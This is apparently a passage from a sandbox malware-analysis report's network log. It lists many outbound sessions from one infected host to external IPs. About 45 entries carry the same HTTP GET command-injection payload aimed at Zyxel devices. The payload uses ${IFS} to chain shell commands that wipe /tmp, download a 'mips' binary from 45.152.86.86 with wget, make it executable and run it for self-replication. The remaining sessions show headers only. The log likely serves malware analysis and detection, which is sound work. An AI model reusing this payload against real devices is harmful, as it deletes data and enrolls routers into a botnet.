                              Mar 31, 2024 08:42:27.596999884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10019192.168.2.1333494109.171.203.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597057104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10020192.168.2.1355380171.205.191.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597095013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10021192.168.2.1340744203.188.132.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597141981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10022192.168.2.1346886211.209.99.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597191095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10023192.168.2.135970078.187.57.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597220898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10024192.168.2.133852865.24.68.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597256899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10025192.168.2.135267284.18.246.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597337961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10026192.168.2.1350522191.222.68.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597407103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10027192.168.2.1336810114.233.69.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597424030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10028192.168.2.135754034.220.212.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597486973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10029192.168.2.134590044.28.217.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597528934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10030192.168.2.13594301.208.14.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597573042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10031192.168.2.1357260163.90.85.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597599030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10032192.168.2.1338608197.206.181.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597650051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10033192.168.2.1336250201.158.242.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597687960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10034192.168.2.1337584126.124.69.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597755909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10035192.168.2.133829691.76.170.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597788095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10036192.168.2.134032432.183.94.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597812891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10037192.168.2.1341264130.43.110.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.597882032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10038192.168.2.1345730147.146.46.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602552891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10039192.168.2.134239831.46.226.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602591991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10040192.168.2.1336908147.30.65.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602637053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10041192.168.2.1359464136.240.162.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602709055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10042192.168.2.1339126152.6.253.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602754116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10043192.168.2.134064487.61.15.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602804899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10044192.168.2.134180066.62.162.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602844000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10045192.168.2.1339120177.78.184.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602880001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10046192.168.2.1352798167.162.115.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602926970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10047192.168.2.134899695.189.240.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.602976084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10048192.168.2.1342652192.66.17.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603025913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10049192.168.2.134243079.255.246.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603053093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10050192.168.2.135497237.19.220.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603090048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10051192.168.2.134466045.134.50.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603127956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10052192.168.2.1343714179.175.27.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603152990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10053192.168.2.135471823.108.98.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603193998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10054192.168.2.134513457.209.136.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603255033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10055192.168.2.1352752210.181.70.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603291988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10056192.168.2.1334008120.82.243.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603362083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10057192.168.2.13378325.44.196.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603384972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10058192.168.2.1340290144.35.217.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603415966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10059192.168.2.1336486182.213.53.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603466988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10060192.168.2.135350045.202.139.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603486061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10061192.168.2.1339090178.159.185.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603533983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10062192.168.2.1360356138.62.76.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603569031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10063192.168.2.134706878.30.104.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:28.603602886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10064192.168.2.133787258.83.122.200443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10065192.168.2.1351760173.150.230.230443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10066192.168.2.135146061.129.89.173443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10067192.168.2.1339764105.208.153.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10068192.168.2.133585217.186.20.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10069192.168.2.134801213.8.51.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10070192.168.2.133744899.54.67.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10071192.168.2.1346060141.153.152.17443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10072192.168.2.1349266177.71.235.37443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10073192.168.2.1333876109.94.109.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10074192.168.2.1351252142.252.206.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10075192.168.2.135030698.37.113.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10076192.168.2.1338372164.19.132.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10077192.168.2.1346854210.54.56.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10078192.168.2.134812879.125.15.168443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10079192.168.2.1352990181.238.251.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10080192.168.2.1352612147.206.105.193443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10081192.168.2.1352490200.150.127.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10082192.168.2.136042667.1.230.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10083192.168.2.136087057.54.174.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10084192.168.2.1338252188.122.153.103443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10085192.168.2.1334222143.207.152.66443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10086192.168.2.1337984134.208.154.38443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10087192.168.2.13597869.185.155.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10088192.168.2.1345134131.169.129.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10089192.168.2.1355648135.70.251.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10090192.168.2.1351838211.49.119.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10091192.168.2.133548225.252.108.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10092192.168.2.1338322173.229.119.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10093192.168.2.135047270.112.174.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10094192.168.2.1354152111.45.30.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10095192.168.2.135741451.22.72.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10096192.168.2.1335670113.240.254.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10097192.168.2.1337922156.47.178.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10098192.168.2.1349802136.155.162.95443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10099192.168.2.1342720150.82.71.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10100192.168.2.1355410126.146.102.107443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10101192.168.2.135982641.31.235.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10102192.168.2.134763663.46.181.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10103192.168.2.1351362187.12.47.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10104192.168.2.13533501.45.188.69443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10105192.168.2.134104437.143.76.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10106192.168.2.134246623.8.130.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10107192.168.2.1357896160.142.144.22443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10108192.168.2.134710442.238.178.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10109192.168.2.1333056169.192.27.154443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10110192.168.2.134496492.251.18.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10111192.168.2.134803651.30.59.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10112192.168.2.133934891.8.118.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10113192.168.2.1335026200.210.101.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10114192.168.2.1349968158.229.195.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10115192.168.2.1355794176.244.57.161443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10116192.168.2.1348332218.206.151.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10117192.168.2.134717432.253.211.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10118192.168.2.13546449.170.86.92443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10119192.168.2.134492825.173.67.230443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10120192.168.2.1355492181.99.159.140443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10121192.168.2.134741845.129.89.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10122192.168.2.133834048.247.180.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10123192.168.2.1355800146.237.77.28443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10124192.168.2.1356088194.187.184.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10125192.168.2.1335132202.210.250.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10126192.168.2.1345430155.51.180.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10127192.168.2.135113452.182.74.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10128192.168.2.1338798115.65.217.66443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10129192.168.2.135161258.90.192.85443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10130192.168.2.1342938206.12.27.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10131192.168.2.134433698.48.21.235443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10132192.168.2.1336626103.42.45.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10133192.168.2.1338684119.37.90.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10134192.168.2.133715459.185.95.50443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10135192.168.2.135833289.164.178.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10136192.168.2.1340958213.39.170.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10137192.168.2.1354226158.69.154.100443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10138192.168.2.1356558103.99.25.100443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10139192.168.2.134075840.105.92.227443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10140192.168.2.133775698.114.70.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10141192.168.2.135220239.62.157.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10142192.168.2.1349434193.207.45.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10143192.168.2.133948812.235.129.97443
